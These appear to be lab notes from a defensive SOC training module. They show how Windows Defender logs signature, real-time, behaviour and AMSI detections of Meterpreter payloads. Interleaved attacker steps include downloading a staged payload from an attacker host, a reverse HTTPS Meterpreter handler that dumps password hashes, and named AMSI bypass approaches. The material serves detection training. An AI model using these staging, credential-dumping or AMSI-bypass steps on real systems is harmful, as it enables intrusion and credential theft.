An antivirus signature is a continuous sequence of bytes within malware that uniquely identify it. Signature-based anitivirus detection is mostly considered a denylist technology. This can still be quite effective however an attacker aware of the signature could adjust very minor parts of their malware to evade this detection.
Signature detection of signature_detect_nonstage.exe from manual file scan
C:\Program Files\Windows Defender>MpCmdRun -Scan -ScanType 3 -File C:\tools\av_alerts_evasion\signature_detect_nonstage.exe -DisableRemediation
Scan starting...
Scan finished.
Scanning C:\tools\av_alerts_evasion\signature_detect_nonstage.exe found 1 threats.
<===========================LIST OF DETECTED THREATS==========================>
----------------------------- Threat information ------------------------------
Threat : Trojan:Win64/Meterpreter.A
Resources : 1 total
file : C:\tools\av_alerts_evasion\signature_detect_nonstage.exe
-------------------------------------------------------------------------------
There isn't much useful information provided here, however we can take a look at the Windows Defender provider for Windows Event Log. Microsoft-Windows-Windows Defender/Operational
Initiating a manual scan of signature_detect_nonstage.exe using Start-MpScan
[192.168.51.14]: PS C:\Users\offsec\Documents> Start-MpScan -ScanPath C:\tools\av_alerts_evasion\signature_detect_nonstage.exe -ScanType CustomScan; Get-Date
Thursday, December 2, 2021 10:59:31 AM
After importing the custom Get-WDLog.psm1...
Windows Defender detection of potentially-malicious threat
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent $null "12/2/2021 10:59:00" "12/2/2021 11:00:00"
ProviderName: Microsoft-Windows-Windows Defender
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
12/2/2021 10:59:21 AM 1116 Warning Microsoft Defender Antivirus has detected malware or other potentially unwanted software....
Full message listing of malicious event
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1116 "12/2/2021 10:59:20" "12/2/2021 11:59:22" | Format-List
TimeCreated : 12/2/2021 10:59:21 AM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1116
Message : Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win64/Meterpreter.A&threatid=2147720175&enterprise=0
Name: Trojan:Win64/Meterpreter.A
ID: 2147720175
Severity: Severe
Category: Trojan
Path: file:_C:\tools\av_alerts_evasion\signature_detect_nonstage.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\LOCAL SERVICE
Process Name: Unknown
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.16400.2, NIS: 0.0.0.0
Because Meterpreter provides remote access to the endpoint for active compromise, Windows Defender has rated it as "Severe". The Category field is a free-form guess as to the type of malware. In this case, a remote-access Trojan. With "Concrete" as the Detection Type, we can confirm that this is a signature-based detection. Both the User and the Detection Origin fields indicate where the detection was initiated. Because we initiated the Start-MpScan cmdlet from a remote connection, the source is System and the user is LOCAL SERVICE. Had we initiated it from the Windows 10 VM, the Detection Origin would be "User" and the User field would contain the domain/user information.
Defender keeps a list of threats detected and can be queried with Get-MpThreat.
Output from Get-MpThreat containing signature_detect_nonstage.exe
The queue of threats can be cleared with Remove-MpThreat.
Using Remove-MpThreat to clear the queue
[192.168.51.14]: PS C:\Users\offsec\Documents> Remove-MpThreat; Get-Date
Thursday, December 2, 2021 11:08:08 AM
Windows Defender removal of potentially-malicious threat
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent $null "12/2/2021 11:08:00" "12/2/2021 11:09:00"
ProviderName: Microsoft-Windows-Windows Defender
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
12/2/2021 11:08:08 AM 1117 Information Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software....
Full content of Windows Defender mitigation event
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1117 "12/2/2021 11:08:07" "12/2/2021 11:08:09" | Format-List
TimeCreated : 12/2/2021 11:08:08 AM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1117
Message : Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win64/Meterpreter.A&threatid=2147720175&enterprise=0
Name: Trojan:Win64/Meterpreter.A
ID: 2147720175
Severity: Severe
Category: Trojan
Path: file:_C:\tools\av_alerts_evasion\signature_detect_nonstage.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\LOCAL SERVICE
Process Name: Unknown
Action: Remove
Action Status: No additional actions required
Error Code: 0x00000000
Error description: The operation completed successfully.
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.16400.2, NIS: 0.0.0.0
Definitions of malware and various categories are updated and stored in %PROGRAMDATA%\Microsoft\Windows Defender\Definition Updates\Default.
Real-time Heuristic and Behavioral-Based Detection
Real-time protection also uses heuristic-based detection and behavior-based detection to identify malicious activities taking place on an endpoint.
Heuristic-based detections rely on rules and algorithms to determine if an action is malicious. This is typically done by stepping through the instruction set of a binary file, or by attempting to decompile and analyze the source code.
Behavior-based detections dynamically analyze the behavior by executing the file in an emulated environment (sandbox) and determining if the actions taken are considered malicious.
When activating real-time protection, Windows Defender will generate a configuration change with Event ID 5007. The HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection key in the Windows Registry will change from 0x0 to 0x1.
PS C:\tools\av_alerts_evasion> Invoke-Webrequest -Uri http://kali:8000/signature_detect_staged.exe -OutFile signature_detect_staged.exe; Get-Date
Wednesday, December 15, 2021 7:13:33 AM
Windows Defender Real-time protection detection of potentially-malicious threat
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent $null "12/15/2021 7:13:00" "12/15/2021 7:14:00"
ProviderName: Microsoft-Windows-Windows Defender
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
12/15/2021 7:13:34 AM 1116 Warning Microsoft Defender Antivirus has detected malware or other potentially unwanted software....
Full message listing of malicious detection event for signature_detect_staged.exe
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1116 "12/15/2021 7:13:33" "12/15/2021 7:13:35" | Format-List
TimeCreated : 12/15/2021 7:13:34 AM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1116
Message : Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win64/Meterpreter.B&threatid=2147721790&enterprise=0
Name: Trojan:Win64/Meterpreter.B
ID: 2147721790
Severity: Severe
Category: Trojan
Path: file:_C:\tools\av_alerts_evasion\signature_detect_staged.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
User: CLIENT02\offsec
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 1.303.25.0
Engine Version: AM: 1.1.16400.2, NIS: 1.1.16400.2
Using Remove-MpThreat to mitigate threats discovered by Windows Defender
[192.168.51.14]: PS C:\Users\offsec\Documents> Remove-MpThreat; Get-Date
Wednesday, December 15, 2021 8:30:48 AM
Full contents of Windows Defender mitigation event for signature_detect_staged.exe
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1117 "12/15/2021 8:30:47" "12/15/2021 8:30:49" | Format-List
TimeCreated : 12/15/2021 8:30:47 AM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1117
Message : Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win64/Meterpreter.B&threatid=2147721790&enterprise=0
Name: Trojan:Win64/Meterpreter.B
ID: 2147721790
Severity: Severe
Category: Trojan
Path: file:_C:\tools\av_alerts_evasion\signature_detect_staged.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
User: NT AUTHORITY\LOCAL SERVICE
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Action: Remove
Action Status: No additional actions required
Error Code: 0x00000000
Error description: The operation completed successfully.
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 1.303.25.0
Engine Version: AM: 1.1.16400.2, NIS: 1.1.16400.2
Because Remove-MpThreat was run from PowerShell Core, the User is logged as NT AUTHORITY\LOCAL SERVICE.
Setting up listener for the undetected payload execution
PS C:\tools\av_alerts_evasion> .\generic_winhttps_connect.exe; Get-Date
Thursday, December 16, 2021 2:18:15 PME
Meterpreter connection and commands
kali@attacker01:~/SOC-200/Antivirus_Alerts_and_Evasion$ ./rtp_behavior_listen.sh 192.168.51.50
Initiating... please wait
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_winhttps
LPORT => 443
LHOST => 192.168.51.50
AutoRunScript => multi_console_command -r /home/kali/SOC-200/Antivirus_Alerts_and_Evasion/rtp_behavior.rc
[*] Started HTTPS reverse handler on https://192.168.51.50:443
[*] https://192.168.51.50:443 handling request from 192.168.51.14; (UUID: 8xk27bby) Staging x64 payload (201308 bytes) ...
[*] Session ID 1 (192.168.51.50:443 -> 127.0.0.1 ) processing AutoRunScript 'multi_console_command -r /home/kali/SOC-200/Antivirus_Alerts_and_Evasion/rtp_behavior.rc'
[*] Running Command List ...
[*] Running command hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
offsec:1001:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ddade167a491d4f28eb25728469310e:::
[*] Running command sysinfo
Computer : CLIENT02
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 5
Meterpreter : x64/windows
[*] Meterpreter session 1 opened (192.168.51.50:443 -> 127.0.0.1 ) at 2021-12-16 17:18:32 -0500
meterpreter >
Malicious detections based on suspicious behavior
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent $null "12/16/2021 14:18:00" "12/16/2021 14:19:00"
ProviderName: Microsoft-Windows-Windows Defender
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
12/16/2021 2:18:43 PM 1116 Warning Microsoft Defender Antivirus has detected malware or other potentially unwanted software....
12/16/2021 2:18:43 PM 1116 Warning Microsoft Defender Antivirus has detected malware or other potentially unwanted software....
Full listing of above detections
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1116 "12/16/2021 14:18:42" "12/16/2021 14:18:44" | Format-List
TimeCreated : 12/16/2021 2:18:43 PM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1116
Message : Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Meterpreter.gen!D&threatid=2147728104&enterprise=0
Name: Behavior:Win32/Meterpreter.gen!D
ID: 2147728104
Severity: Severe
Category: Suspicious Behavior
Path: behavior:_pid:5420:56844127554067; file:_C:\tools\av_alerts_evasion\generic_winhttps_connect.exe; process:_pid:5420,ProcessStart:132841666953648975
Detection Origin: Local machine
Detection Type: Generic
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: C:\tools\av_alerts_evasion\generic_winhttps_connect.exe
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 1.303.25.0
Engine Version: AM: 1.1.16400.2, NIS: 1.1.16400.2
TimeCreated : 12/16/2021 2:18:43 PM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1116
Message : Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Meterpreter.gen!A&threatid=2147723573&enterprise=0
Name: Behavior:Win32/Meterpreter.gen!A
ID: 2147723573
Severity: Severe
Category: Suspicious Behavior
Path: behavior:_pid:5420:74439734262196; process:_pid:5420,ProcessStart:132841666953648975
Detection Origin: Unknown
Detection Type: Generic
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: C:\tools\av_alerts_evasion\generic_winhttps_connect.exe
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 1.303.25.0
Engine Version: AM: 1.1.16400.2, NIS: 1.1.16400.2
Antimalware Scan Interface (AMSI)
Understanding AMSI
AMSI blocking a malicious string
PS C:\av_alerts_evasion> Get-Date
Tuesday, December 21, 2021 8:00:02 AM
PS C:\Users\offsec> "amsiutils"
At line:1 char:1
+ "amsiutils"
+ ~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Note that using a large number of AMSI trigger strings while testing may cause Windows Defender to "panic" and suddenly consider everything malicious. At this point, the only remedies are to reboot the system or revert the VM groups.
Full event of malicious detection by AMSI
[192.168.51.14]: PS C:\Users\offsec\Documents> Get-WDLogEvent 1116 "12/21/2021 8:00:00" "12/21/2021 8:01:00" | Format-List
TimeCreated : 12/21/2021 8:00:06 AM
ProviderName : Microsoft-Windows-Windows Defender
Id : 1116
Message : Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/AmsiTamper.A!ams&threatid=2147728399&enterprise=0
Name: Trojan:Win32/AmsiTamper.A!ams
ID: 2147728399
Severity: Severe
Category: Trojan
Path: amsi:_C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: AMSI
User: CLIENT02\offsec
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Security intelligence Version: AV: 1.303.25.0, AS: 1.303.25.0, NIS: 1.303.25.0
Engine Version: AM: 1.1.16400.2, NIS: 1.1.16400.2
Bypassing AMSI
There are ways to bypass AMSI, a couple are:
Directly overwriting the AmsiScanBuffer function.
Full Script Block event with an AMSI bypass script
Without going into detail, security researchers have found that the AmsiInitializefunction creates an undocumented context structure, which is used repeatedly by other functions in AMSI. Theoretically, if this unknown region of memory were corrupted or otherwise neutralized, AMSI would stop working altogether.
